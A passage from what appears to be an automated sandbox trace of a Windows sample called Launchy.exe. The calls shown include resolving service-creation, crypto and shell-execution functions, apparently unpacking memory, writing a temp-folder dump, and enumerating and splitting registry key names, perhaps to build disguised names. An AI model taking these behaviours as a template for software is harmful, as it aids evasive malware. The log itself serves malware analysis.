(hModule=0x76d30000, lpProcName="QueryDosDeviceW") returned 0x76d6ceec [0029.432] GetProcAddress (hModule=0x76d30000, lpProcName="QueryPerformanceCounter") returned 0x76d41725 [0029.433] GetProcAddress (hModule=0x76d30000, lpProcName="GetLogicalDriveStringsW") returned 0x76dc436f [0029.433] GetProcAddress (hModule=0x76d30000, lpProcName="GetDriveTypeW") returned 0x76d4418b [0029.433] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileAttributesW") returned 0x76d41b18 [0029.433] GetProcAddress (hModule=0x76d30000, lpProcName="QueryPerformanceFrequency") returned 0x76d441f0 [0029.433] GetProcAddress (hModule=0x76d30000, lpProcName="MultiByteToWideChar") returned 0x76d4192e [0029.433] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileMappingW") returned 0x76d41909 [0029.433] GetProcAddress (hModule=0x76d30000, lpProcName="GetTempPathW") returned 0x76d5d4dc [0029.433] GetProcAddress (hModule=0x76d30000, lpProcName="UnmapViewOfFile") returned 0x76d41826 [0029.433] GetProcAddress (hModule=0x76d30000, lpProcName="MapViewOfFile") returned 0x76d418f1 [0029.433] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleFileNameW") returned 0x76d44950 [0029.433] GetProcAddress (hModule=0x76d30000, lpProcName="ReadFile") returned 0x76d43ed3 [0029.433] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileSize") returned 0x76d4196e [0029.433] GetProcAddress (hModule=0x76d30000, lpProcName="GetTempFileNameW") returned 0x76d6d1b6 [0029.433] GetProcAddress (hModule=0x76d30000, lpProcName="ExpandEnvironmentStringsW") returned 0x76d44173 [0029.433] GetProcAddress (hModule=0x76d30000, lpProcName="SetFileTime") returned 0x76d5ecbb [0029.433] GetProcAddress (hModule=0x76d30000, lpProcName="GetWindowsDirectoryW") returned 0x76d443e2 [0029.434] LoadLibraryExA (lpLibFileName="ADVAPI32.dll", hFile=0x0, dwFlags=0x0) returned 0x77710000 [0029.434] GetProcAddress (hModule=0x77710000, lpProcName="CreateServiceW") returned 0x7773712c [0029.434] GetProcAddress (hModule=0x77710000, lpProcName="RegEnumKeyW") returned 0x7772445b [0029.434] GetProcAddress (hModule=0x77710000, lpProcName="CryptAcquireContextW") returned 0x7771df14 [0029.434] GetProcAddress (hModule=0x77710000, lpProcName="CryptGenRandom") returned 0x7771dfc8 [0029.434] GetProcAddress (hModule=0x77710000, lpProcName="CryptReleaseContext") returned 0x7771e124 [0029.434] GetProcAddress (hModule=0x77710000, lpProcName="GetSidSubAuthority") returned 0x77720e24 [0029.434] GetProcAddress (hModule=0x77710000, lpProcName="GetTokenInformation") returned 0x7772431c [0029.434] GetProcAddress (hModule=0x77710000, lpProcName="OpenProcessToken") returned 0x77724304 [0029.434] GetProcAddress (hModule=0x77710000, lpProcName="GetSidSubAuthorityCount") returned 0x77720e0c [0029.434] GetProcAddress (hModule=0x77710000, lpProcName="OpenSCManagerW") returned 0x7771ca64 [0029.434] GetProcAddress (hModule=0x77710000, lpProcName="SetServiceStatus") returned 0x7771c7a6 [0029.434] GetProcAddress (hModule=0x77710000, lpProcName="RegDeleteValueW") returned 0x7771cf31 [0029.434] GetProcAddress (hModule=0x77710000, lpProcName="DeleteService") returned 0x7773715c [0029.434] GetProcAddress (hModule=0x77710000, lpProcName="RegSetValueExW") returned 0x777214d6 [0029.435] GetProcAddress (hModule=0x77710000, lpProcName="RegCloseKey") returned 0x7772469d [0029.435] GetProcAddress (hModule=0x77710000, lpProcName="StartServiceW") returned 0x77717974 [0029.435] GetProcAddress (hModule=0x77710000, lpProcName="CloseServiceHandle") returned 0x7772369c [0029.435] GetProcAddress (hModule=0x77710000, lpProcName="ControlService") returned 0x77737144 [0029.435] GetProcAddress (hModule=0x77710000, lpProcName="RegisterServiceCtrlHandlerW") returned 0x7771a97d [0029.435] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenKeyExW") returned 0x7772468d [0029.435] GetProcAddress (hModule=0x77710000, lpProcName="QueryServiceStatusEx") returned 0x7771798c [0029.435] GetProcAddress (hModule=0x77710000, lpProcName="StartServiceCtrlDispatcherW") returned 0x7771a965 [0029.435] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenKeyW") returned 0x77722459 [0029.435] LoadLibraryExA (lpLibFileName="SHELL32.dll", hFile=0x0, dwFlags=0x0) returned 0x759d0000 [0029.435] GetProcAddress (hModule=0x759d0000, lpProcName="CommandLineToArgvW") returned 0x759e9ee8 [0029.435] GetProcAddress (hModule=0x759d0000, lpProcName="ShellExecuteExW") returned 0x759f1e46 [0029.435] LoadLibraryExA (lpLibFileName="ole32.dll", hFile=0x0, dwFlags=0x0) returned 0x76620000 [0030.252] GetProcAddress (hModule=0x76620000, lpProcName="CreateStreamOnHGlobal") returned 0x7664363b [0030.252] VirtualProtect (in: lpAddress=0x401000, dwSize=0x77c7, flNewProtect=0x210160, lpflOldProtect=0x18fbcc | out: lpflOldProtect=0x18fbcc*=0x2) returned 0 [0030.285] VirtualProtect (in: lpAddress=0x409000, dwSize=0xe90, flNewProtect=0x210140, lpflOldProtect=0x18fbcc | out: lpflOldProtect=0x18fbcc*=0x2) returned 0 [0030.286] VirtualProtect (in: lpAddress=0x40a000, dwSize=0x658, flNewProtect=0x210148, lpflOldProtect=0x18fbcc | out: lpflOldProtect=0x18fbcc*=0x2) returned 0 [0030.286] VirtualProtect (in: lpAddress=0x40b000, dwSize=0x4658, flNewProtect=0x210140, lpflOldProtect=0x18fbcc | out: lpflOldProtect=0x18fbcc*=0x2) returned 0 [0030.287] VirtualProtect (in: lpAddress=0x410000, dwSize=0x938, flNewProtect=0x210140, lpflOldProtect=0x18fbcc | out: lpflOldProtect=0x18fbcc*=0x2) returned 0 [0030.287] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0030.288] GetProcessHeap () returned 0x6d0000 [0030.289] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x4681) returned 0x6e8848 [0030.350] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff5c | out: lpSystemTimeAsFileTime=0x18ff5c*(dwLowDateTime=0xbb89f180, dwHighDateTime=0x1d64ac6)) [0030.350] QueryPerformanceFrequency (in: lpFrequency=0x18ff64 | out: lpFrequency=0x18ff64*=100000000) returned 1 [0030.372] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff54 | out: lpPerformanceCount=0x18ff54*=15099583920) returned 1 [0030.372] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0xbc [0030.372] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0030.373] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x208) returned 0x6eced8 [0030.373] GetModuleFileNameW (in: hModule=0x400000, lpFilename=0x6eced8, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Launchy.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\launchy.exe")) returned 0x31 [0030.373] StrRChrW (lpStart="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Launchy.exe", lpEnd=0x0, wMatch=0x5c) returned="\\Launchy.exe" [0030.373] lstrlenW (lpString="Launchy.exe") returned 11 [0030.373] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x18) returned 0x6e7db0 [0030.373] PathFindExtensionW (pszPath="Launchy.exe") returned=".exe" [0030.373] StrChrW (lpStart="Launchy", wMatch=0x3a) returned 0x0 [0030.374] LoadLibraryA (lpLibFileName="DBGHELP.DLL") returned 0x75590000 [0030.600] GetProcAddress (hModule=0x75590000, lpProcName="MiniDumpWriteDump") returned 0x755d5d38 [0030.600] lstrlenW (lpString="Launchy") returned 7 [0030.600] ExpandEnvironmentStringsW (in: lpSrc="%temp%\\", lpDst=0x0, nSize=0x0 | out: lpDst=0x0) returned 0x26 [0030.600] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x64) returned 0x6ed8e8 [0030.600] ExpandEnvironmentStringsW (in: lpSrc="%temp%\\", lpDst=0x6ed8e8, nSize=0x26 | out: lpDst="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\") returned 0x26 [0030.601] lstrcatW (in: lpString1="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\", lpString2="Launchy" | out: lpString1="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\Launchy") returned="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\Launchy" [0030.601] lstrcatW (in: lpString1="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\Launchy", lpString2=".dmp" | out: lpString1="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\Launchy.dmp") returned="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\Launchy.dmp" [0030.601] CreateFileW (lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\Launchy.dmp" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\launchy.dmp"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xc0 [0030.602] SetFilePointer (in: hFile=0xc0, lDistanceToMove=65536, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x10000 [0030.602] SetEndOfFile (hFile=0xc0) returned 1 [0030.602] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x40416a) returned 0x0 [0030.602] RegOpenKeyW (in: hKey=0x80000002, lpSubKey="SYSTEM\\CurrentControlSet\\Control", phkResult=0x18ff88 | out: phkResult=0x18ff88*=0xc4) returned 0x0 [0030.603] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x0, lpName=0x18fd58, cchName=0x104 | out: lpName="ACPI") returned 0x0 [0030.603] lstrlenW (lpString="ACPI") returned 4 [0030.603] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x16) returned 0x6e7e30 [0030.603] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x1, lpName=0x18fd58, cchName=0x104 | out: lpName="AGP") returned 0x0 [0030.603] lstrlenW (lpString="AGP") returned 3 [0030.603] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x14) returned 0x6e7e50 [0030.603] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x2, lpName=0x18fd58, cchName=0x104 | out: lpName="AppID") returned 0x0 [0030.603] lstrlenW (lpString="AppID") returned 5 [0030.603] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x14) returned 0x6e7e70 [0030.603] lstrcmpW (lpString1="agp", lpString2="app") returned -1 [0030.605] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x12) returned 0x6e7eb0 [0030.605] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x3, lpName=0x18fd58, cchName=0x104 | out: lpName="Arbiters") returned 0x0 [0030.605] lstrlenW (lpString="Arbiters") returned 8 [0030.605] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1e) returned 0x6ed150 [0030.605] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x4, lpName=0x18fd58, cchName=0x104 | out: lpName="BackupRestore") returned 0x0 [0030.605] lstrlenW (lpString="BackupRestore") returned 13 [0030.605] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1a) returned 0x6ed178 [0030.606] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x6ed1a0 [0030.606] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x5, lpName=0x18fd58, cchName=0x104 | out: lpName="Class") returned 0x0 [0030.606] lstrlenW (lpString="Class") returned 5 [0030.606] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x18) returned 0x6e7ed0 [0030.606] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x6, lpName=0x18fd58, cchName=0x104 | out: lpName="CMF") returned 0x0 [0030.606] lstrlenW (lpString="CMF") returned 3 [0030.606] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x14) returned 0x6e7ef0 [0030.606] lstrcmpW (lpString1="agp", lpString2="cmf") returned -1 [0030.606] lstrcmpW (lpString1="app", lpString2="cmf") returned -1 [0030.606] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x7, lpName=0x18fd58, cchName=0x104 | out: lpName="CoDeviceInstallers") returned 0x0 [0030.606] lstrlenW (lpString="CoDeviceInstallers") returned 18 [0030.606] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x12) returned 0x6e7f10 [0030.606] lstrcmpW (lpString1="id", lpString2="co") returned 1 [0030.606] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1a) returned 0x6ed1c8 [0030.606] lstrcmpW (lpString1="backup", lpString2="device") returned -1 [0030.606] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x22) returned 0x6edec8 [0030.606] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x8, lpName=0x18fd58, cchName=0x104 | out: lpName="COM Name Arbiter") returned 0x0 [0030.606] lstrlenW (lpString="COM Name Arbiter") returned 16 [0030.606] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x14) returned 0x6e7f30 [0030.606] lstrcmpW (lpString1="agp", lpString2="com") returned -1 [0030.606] lstrcmpW (lpString1="app", lpString2="com") returned -1 [0030.606] lstrcmpW (lpString1="cmf", lpString2="com") returned -1 [0030.606] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x16) returned 0x6e7f50 [0030.606] lstrcmpW (lpString1="acpi", lpString2="name") returned -1 [0030.606] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x6ed1f0 [0030.606] lstrcmpW (lpString1="restore", lpString2="arbiter") returned 1 [0030.606] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x9, lpName=0x18fd58, cchName=0x104 | out: lpName="ComputerName") returned 0x0 [0030.607] lstrlenW (lpString="ComputerName") returned 12 [0030.607] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1e) returned 0x6ed218 [0030.607] lstrcmpW (lpString1="arbiters", lpString2="computer") returned -1 [0030.607] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x16) returned 0x6e7f70 [0030.607] lstrcmpW (lpString1="acpi", lpString2="name") returned -1 [0030.607] lstrcmpW (lpString1="name", lpString2="name") returned 0 [0030.607] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7f70 | out: hHeap=0x6d0000) returned 1 [0030.607] RegEnumKeyW (in: hKey=0xc4, dwIndex=0xa, lpName=0x18fd58, cchName=0x104 | out: lpName="ContentIndex") returned 0x0 [0030.607] lstrlenW (lpString="ContentIndex") returned 12 [0030.607] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x6ed240 [0030.607] lstrcmpW (lpString1="restore", lpString2="content") returned 1 [0030.607] lstrcmpW (lpString1="arbiter", lpString2="content") returned -1 [0030.607] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x18) returned 0x6e7f70 [0030.607] lstrcmpW (lpString1="class", lpString2="index") returned -1 [0030.607] RegEnumKeyW (in: hKey=0xc4, dwIndex=0xb, lpName=0x18fd58, cchName=0x104 | out: lpName="CrashControl") returned 0x0 [0030.607] lstrlenW (lpString="CrashControl") returned 12 [0030.607] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x18) returned 0x6e7f90 [0030.607] lstrcmpW (lpString1="class", lpString2="crash") returned -1 [0030.607] lstrcmpW (lpString1="index", lpString2="crash") returned 1 [0030.607] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x6ed268 [0030.607] lstrcmpW (lpString1="restore", lpString2="control") returned 1 [0030.607] lstrcmpW (lpString1="arbiter", lpString2="control") returned -1 [0030.607] lstrcmpW (lpString1="content", lpString2="control") returned -1 [0030.607] RegEnumKeyW (in: hKey=0xc4, dwIndex=0xc, lpName=0x18fd58, cchName=0x104 | out: lpName="CriticalDeviceDatabase") returned 0x0 [0030.607] lstrlenW (lpString="CriticalDeviceDatabase") returned 22 [0030.607] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1e) returned 0x6ed290 [0030.607] lstrcmpW (lpString1="arbiters", lpString2="critical") returned -1 [0030.608] lstrcmpW (lpString1="computer", lpString2="critical") returned -1 [0030.608] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1a) returned 0x6ed2b8 [0030.608] lstrcmpW (lpString1="backup", lpString2="device") returned -1 [0030.608] lstrcmpW (lpString1="device", lpString2="device") returned 0 [0030.608] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6ed2b8 | out: hHeap=0x6d0000) returned 1 [0030.608] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1e) returned 0x6ed2b8 [0030.608] lstrcmpW (lpString1="arbiters", lpString2="database") returned -1 [0030.608] lstrcmpW (lpString1="computer", lpString2="database") returned -1 [0030.608] lstrcmpW (lpString1="critical", lpString2="database") returned -1 [0030.608] RegEnumKeyW (in: hKey=0xc4, dwIndex=0xd, lpName=0x18fd58, cchName=0x104 | out: lpName="Cryptography") returned 0x0 [0030.608] lstrlenW (lpString="Cryptography") returned 12 [0030.608] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x26) returned 0x6edef8 [0030.608] RegEnumKeyW (in: hKey=0xc4, dwIndex=0xe, lpName=0x18fd58, cchName=0x104 | out: lpName="DeviceClasses") returned 0x0 [0030.608] lstrlenW (lpString="DeviceClasses") returned 13 [0030.608] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1a) returned 0x6ed2e0 [0030.608] lstrcmpW (lpString1="backup", lpString2="device") returned -1 [0030.608] lstrcmpW (lpString1="device", lpString2="device") returned 0 [0030.608] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6ed2e0 | out: hHeap=0x6d0000) returned 1 [0030.608] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x6ed2e0 [0030.608] lstrcmpW (lpString1="restore", lpString2="classes") returned 1 [0030.608] lstrcmpW (lpString1="arbiter", lpString2="classes") returned -1 [0030.608] lstrcmpW (lpString1="content", lpString2="classes") returned 1 [0030.608] lstrcmpW (lpString1="control", lpString2="classes") returned 1 [0030.608] RegEnumKeyW (in: hKey=0xc4, dwIndex=0xf, lpName=0x18fd58, cchName=0x104 | out: lpName="DeviceOverrides") returned 0x0 [0030.608] lstrlenW (lpString="DeviceOverrides") returned 15 [0030.608] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1a) returned 0x6ed308 [0030.608] lstrcmpW (lpString1="backup", lpString2="device") returned -1 [0030.608] lstrcmpW (lpString1="device", lpString2="device") returned 0 [0030.608] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6ed308 | out: hHeap=0x6d0000) returned 1 [0030.608] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x20) returned 0x6ed308 [0030.609] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x10, lpName=0x18fd58, cchName=0x104 | out: lpName="Diagnostics") returned 0x0 [0030.609] lstrlenW (lpString="Diagnostics") returned 11 [0030.609] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x24) returned 0x6edf28 [0030.609] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x11, lpName=0x18fd58, cchName=0x104 | out: lpName="Els") returned 0x0 [0030.609] lstrlenW (lpString="Els") returned 3 [0030.609] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x14) returned 0x6e7fb0 [0030.609] lstrcmpW (lpString1="agp", lpString2="els") returned -1 [0030.609] lstrcmpW (lpString1="app", lpString2="els") returned -1 [0030.609] lstrcmpW (lpString1="cmf", lpString2="els") returned -1 [0030.609] lstrcmpW (lpString1="com", lpString2="els") returned -1 [0030.609] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x12, lpName=0x18fd58, cchName=0x104 | out: lpName="Errata") returned 0x0 [0030.609] lstrlenW (lpString="Errata") returned 6 [0030.609] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1a) returned 0x6ed330 [0030.609] lstrcmpW (lpString1="backup", lpString2="errata") returned -1 [0030.609] lstrcmpW (lpString1="device", lpString2="errata") returned -1 [0030.609] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x13, lpName=0x18fd58, cchName=0x104 | out: lpName="FileSystem") returned 0x0 [0030.609] lstrlenW (lpString="FileSystem") returned 10 [0030.609] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x16) returned 0x6e7fd0 [0030.609] lstrcmpW (lpString1="acpi", lpString2="file") returned -1 [0030.609] lstrcmpW (lpString1="name", lpString2="file") returned 1 [0030.609] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1a) returned 0x6ed358 [0030.609] lstrcmpW (lpString1="backup", lpString2="system") returned -1 [0030.609] lstrcmpW (lpString1="device", lpString2="system") returned -1 [0030.609] lstrcmpW (lpString1="errata", lpString2="system") returned -1 [0030.609] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x14, lpName=0x18fd58, cchName=0x104 | out: lpName="FileSystemUtilities") returned 0x0 [0030.609] lstrlenW (lpString="FileSystemUtilities") returned 19 [0030.609] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x16) returned 0x6e7ff0 [0030.609] lstrcmpW (lpString1="acpi", lpString2="file") returned -1 [0030.610] lstrcmpW (lpString1="name", lpString2="file") returned 1 [0030.610] lstrcmpW (lpString1="file", lpString2="file") returned 0 [0030.610] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6e7ff0 | out: hHeap=0x6d0000) returned 1 [0030.610] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1a) returned 0x6ed380 [0030.610] lstrcmpW (lpString1="backup", lpString2="system") returned -1 [0030.610] lstrcmpW (lpString1="device", lpString2="system") returned -1 [0030.610] lstrcmpW (lpString1="errata", lpString2="system") returned -1 [0030.610] lstrcmpW (lpString1="system", lpString2="system") returned 0 [0030.610] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6ed380 | out: hHeap=0x6d0000) returned 1 [0030.610] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x20) returned 0x6ed380 [0030.610] lstrcmpW (lpString1="overrides", lpString2="utilities") returned -1 [0030.610] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x15, lpName=0x18fd58, cchName=0x104 | out: lpName="GraphicsDrivers") returned 0x0 [0030.610] lstrlenW (lpString="GraphicsDrivers") returned 15 [0030.610] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1e) returned 0x6ed3a8 [0030.610] lstrcmpW (lpString1="arbiters", lpString2="graphics") returned -1 [0030.610] lstrcmpW (lpString1="computer", lpString2="graphics") returned -1 [0030.610] lstrcmpW (lpString1="critical", lpString2="graphics") returned -1 [0030.610] lstrcmpW (lpString1="database", lpString2="graphics") returned -1 [0030.610] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x6ed3d0 [0030.610] lstrcmpW (lpString1="restore", lpString2="drivers") returned 1 [0030.610] lstrcmpW (lpString1="arbiter", lpString2="drivers") returned -1 [0030.610] lstrcmpW (lpString1="content", lpString2="drivers") returned -1 [0030.610] lstrcmpW (lpString1="control", lpString2="drivers") returned -1 [0030.610] lstrcmpW (lpString1="classes", lpString2="drivers") returned -1 [0030.610] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x16, lpName=0x18fd58, cchName=0x104 | out: lpName="GroupOrderList") returned 0x0 [0030.610] lstrlenW (lpString="GroupOrderList") returned 14 [0030.610] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x18) returned 0x6e7ff0 [0030.610] lstrcmpW (lpString1="class", lpString2="group") returned -1 [0030.610] lstrcmpW (lpString1="index", lpString2="group") returned 1 [0030.610] lstrcmpW (lpString1="crash", lpString2="group") returned -1 [0030.610] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x18) returned 0x6e8010 [0030.611] lstrcmpW (lpString1="class", lpString2="order") returned -1 [0030.611] lstrcmpW (lpString1="index", lpString2="order") returned -1 [0030.611] lstrcmpW (lpString1="crash", lpString2="order") returned -1 [0030.611] lstrcmpW (lpString1="group", lpString2="order") returned -1 [0030.611] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x16) returned 0x6e8030 [0030.611] lstrcmpW (lpString1="acpi", lpString2="list") returned -1 [0030.611] lstrcmpW (lpString1="name", lpString2="list") returned 1 [0030.611] lstrcmpW (lpString1="file", lpString2="list") returned -1 [0030.611] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x17, lpName=0x18fd58, cchName=0x104 | out: lpName="HAL") returned 0x0 [0030.611] lstrlenW (lpString="HAL") returned 3 [0030.611] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x14) returned 0x6e8050 [0030.611] lstrcmpW (lpString1="agp", lpString2="hal") returned -1 [0030.611] lstrcmpW (lpString1="app", lpString2="hal") returned -1 [0030.611] lstrcmpW (lpString1="cmf", lpString2="hal") returned -1 [0030.611] lstrcmpW (lpString1="com", lpString2="hal") returned -1 [0030.611] lstrcmpW (lpString1="els", lpString2="hal") returned -1 [0030.611] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x18, lpName=0x18fd58, cchName=0x104 | out: lpName="IDConfigDB") returned 0x0 [0030.611] lstrlenW (lpString="IDConfigDB") returned 10 [0030.611] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1e) returned 0x6ed3f8 [0030.611] lstrcmpW (lpString1="arbiters", lpString2="idconfig") returned -1 [0030.612] lstrcmpW (lpString1="computer", lpString2="idconfig") returned -1 [0030.612] lstrcmpW (lpString1="critical", lpString2="idconfig") returned -1 [0030.612] lstrcmpW (lpString1="database", lpString2="idconfig") returned -1 [0030.612] lstrcmpW (lpString1="graphics", lpString2="idconfig") returned -1 [0030.612] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x12) returned 0x6e8070 [0030.612] lstrcmpW (lpString1="id", lpString2="db") returned 1 [0030.612] lstrcmpW (lpString1="co", lpString2="db") returned -1 [0030.612] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x19, lpName=0x18fd58, cchName=0x104 | out: lpName="Keyboard Layout") returned 0x0 [0030.612] lstrlenW (lpString="Keyboard Layout") returned 15 [0030.612] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1e) returned 0x6ed420 [0030.612] lstrcmpW (lpString1="arbiters", lpString2="keyboard") returned -1 [0030.612] lstrcmpW (lpString1="computer", lpString2="keyboard") returned -1 [0030.612] lstrcmpW (lpString1="critical", lpString2="keyboard") returned -1 [0030.612] lstrcmpW (lpString1="database", lpString2="keyboard") returned -1 [0030.612] lstrcmpW (lpString1="graphics", lpString2="keyboard") returned -1 [0030.612] lstrcmpW (lpString1="idconfig", lpString2="keyboard") returned -1 [0030.612] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1a) returned 0x6ed448 [0030.612] lstrcmpW (lpString1="backup", lpString2="layout") returned -1 [0030.612] lstrcmpW (lpString1="device", lpString2="layout") returned -1 [0030.612] lstrcmpW (lpString1="errata", lpString2="layout") returned -1 [0030.612] lstrcmpW (lpString1="system", lpString2="layout") returned 1 [0030.612] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x1a, lpName=0x18fd58, cchName=0x104 | out: lpName="Keyboard Layouts") returned 0x0 [0030.612] lstrlenW (lpString="Keyboard Layouts") returned 16 [0030.612] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1e) returned 0x6ed470 [0030.612] lstrcmpW (lpString1="arbiters", lpString2="keyboard") returned -1 [0030.612] lstrcmpW (lpString1="computer", lpString2="keyboard") returned -1 [0030.612] lstrcmpW (lpString1="critical", lpString2="keyboard") returned -1 [0030.612] lstrcmpW (lpString1="database", lpString2="keyboard") returned -1 [0030.612] lstrcmpW (lpString1="graphics", lpString2="keyboard") returned -1 [0030.612] lstrcmpW (lpString1="idconfig", lpString2="keyboard") returned -1 [0030.612] lstrcmpW (lpString1="keyboard", lpString2="keyboard") returned 0 [0030.612] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x6ed470 | out: hHeap=0x6d0000) returned 1 [0030.612] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x1c) returned 0x6ed470 [0030.613] lstrcmpW (lpString1="restore", lpString2="layouts") returned 1 [0030.613] lstrcmpW (lpString1="arbiter", lpString2="layouts") returned -1 [0030.613] lstrcmpW (lpString1="content", lpString2="layouts") returned -1 [0030.613] lstrcmpW (lpString1="control", lpString2="layouts") returned -1 [0030.613] lstrcmpW (lpString1="classes", lpString2="layouts") returned -1 [0030.613] lstrcmpW (lpString1="drivers", lpString2="layouts") returned -1 [0030.613] RegEnumKeyW (in: hKey=0xc4, dwIndex=0x1b, lpName=0x18fd58, cchName=0x104 | out: lpName="Lsa") returned 0x0 [0030.613] lstrlenW 